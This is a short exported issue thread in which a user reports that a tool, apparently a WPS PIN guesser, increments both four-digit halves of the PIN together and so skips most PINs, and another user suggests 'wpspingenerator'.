I tried it, without the option -p, (my pc is faster then 3 sec/pin), and both 
half pin - the first 4 pins and the second 4 pins - increased of 1.

ex:
00010001
00020002.

So not all pins are tried.

I'm not a programmer, so, may you correct the algorithm?

Original comment by alfdi...@gmail.com on 7 May 2013 at 12:54

GoogleCodeExporter commented 9 years ago
try wpspingenerator

Original comment by rnaa...@gmail.com on 11 May 2013 at 1:54